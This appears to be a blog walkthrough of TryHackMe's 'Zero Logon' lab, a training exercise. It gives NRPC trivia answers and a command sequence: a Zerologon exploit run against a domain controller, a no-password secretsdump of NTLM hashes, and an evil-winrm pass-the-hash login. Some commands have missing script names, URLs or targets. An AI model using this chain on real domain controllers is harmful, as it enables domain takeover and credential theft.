The Dutch Hacker
zero logon tryhackme

Zero Logon on TryHackme

This is the write up for the room Zero Logon on Tryhackme and it is part of the Tryhackme Cyber Defense Path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment

TASK Zero Logon

Task 1

Read all that is in the task and press complete

  • Tom Tervoort of Secura –
  • Microsoft –
  • Microsoft –
Zero Logon tryhackme

Task 2

Install Impacket if not already installed using the below commands

python3 -m pip install virtualenv

python3 -m virtualenv impacketEnv

source impacketEnv/bin/activate

pip install git+

Task 3

Open a terminal and navigate to the download directory

enter the following command to get the PoC file

Zero Logon tryhackme

3.1 What method will allow us to change Passwords over NRPC?

You can find this in the picture of task 1

Answer: NetrServerPasswordSet2

3.2 What are the required fields for the method per the Microsoft Documentation?

Documentation can be found here [MS-NRPC]: NetrServerPasswordSet2 (Opnum 30) | Microsoft Docs

Answer: PrimaryName,AccountName,SecureChannelType,ComputerName,Authenticator,ReturnAuthenticator,ClearNewPassword

3.3 What Opnumber is the Method?

Answer: 30

Task 4

Start the machine attached to this task

First we are getting the correct py


4.1 What is the NetBIOS name of the Domain Controller?

Type in the folowing comman dot run an nmap scan

nmap -sC -sV
Zero Logon tryhackme
Answer:  DC01

4.2 What is the NetBIOS domain name of the network?


4.3 What domain are you attacking?

Answer: Hololive.local

4.4 What is the Local Administrator’s NTLM hash?

Make sure you have followed along with task 2 to get impacket in een env

run the following command to exploit the domain controller

python3 DC01 MACHINE_IP

Now we can do a secrets dump by typing in the following command -just-dc -no-pass DC01\$@MACHINE_IP

The answer is what is higlighted

4.5 How many Domain Admin accounts are there?

Counting all account that are prefix with an A-

Answer: 2

4.6 What is the root flag?

We will do this with evil-winrm by typing the following command

evil-winrm -i -u Administrator -H <FOUND HASH IN PREVIOUS ANSWER>

As you can see in the screenshot the flag is on the users desktop called root.txt . You can see the content with the command type

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us